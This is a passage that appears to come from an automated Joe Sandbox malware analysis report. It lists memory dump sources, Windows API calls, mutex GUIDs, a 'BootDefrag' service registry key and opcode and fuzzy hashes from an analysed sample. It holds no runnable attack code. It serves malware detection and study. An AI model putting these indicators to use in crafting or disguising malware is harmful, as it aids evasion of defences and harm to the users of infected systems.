• Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Path$#165CloseExistsFileFolderOpenSpecial
                                                                                                                                                                                                                                                                                                • String ID: SYSTEM\CurrentControlSet\services\BootDefrag
                                                                                                                                                                                                                                                                                                • API String ID: 1591709053-3464295076
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00497DDC,00000000), ref: 00401283
                                                                                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00401295
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CompatibleCreateExchangeInterlocked
                                                                                                                                                                                                                                                                                                • String ID: }I
                                                                                                                                                                                                                                                                                                • API String ID: 1770991917-1906338323
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(00497DDC,00000000), ref: 004012B2
                                                                                                                                                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 004012C4
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DeleteExchangeInterlocked
                                                                                                                                                                                                                                                                                                • String ID: }I
                                                                                                                                                                                                                                                                                                • API String ID: 1722977832-1906338323
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateMutexW.KERNEL32(00000000,00000000,{E0A52416-D56A-4c3d-BFC7-3F40E77C718E}), ref: 0041A782
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0041A793
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • {E0A52416-D56A-4c3d-BFC7-3F40E77C718E}, xrefs: 0041A779
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                                                                                • String ID: {E0A52416-D56A-4c3d-BFC7-3F40E77C718E}
                                                                                                                                                                                                                                                                                                • API String ID: 1925916568-1835452401
                                                                                                                                                                                                                                                                                                • Opcode ID: 808971c6715f0aa7f10f9f42aa529678d4de9f456662d07aefcc006699d7f1bb
                                                                                                                                                                                                                                                                                                • Instruction ID: f658fb253292798967ff69ee4118aed0b3c4d26085bed42abcbed525fae359d1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 808971c6715f0aa7f10f9f42aa529678d4de9f456662d07aefcc006699d7f1bb
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80D05E383003019BEB609B30CC9979A35A0AB40742FE0887EF01FE46C0DA6CD5C48E09
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateMutexW.KERNEL32(00000000,00000000,{4391F12D-936B-4037-9383-DCB800DF7B65}), ref: 0041A742
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0041A753
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • {4391F12D-936B-4037-9383-DCB800DF7B65}, xrefs: 0041A739
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                                                                                • String ID: {4391F12D-936B-4037-9383-DCB800DF7B65}
                                                                                                                                                                                                                                                                                                • API String ID: 1925916568-3123431990
                                                                                                                                                                                                                                                                                                • Opcode ID: 091c4e7f644ce8bd6197cdb533c163e751dc47d35b49d56a391d01d6980858d1
                                                                                                                                                                                                                                                                                                • Instruction ID: ec8680d88669c7631082afe2fce56944a0d96bb555ced3f370f40cb7f6e8cb2a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 091c4e7f644ce8bd6197cdb533c163e751dc47d35b49d56a391d01d6980858d1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32D05E343003019BEB646B30CC9539A35A0AB40742FE0887EF01FE46D0EA6CD5D49A09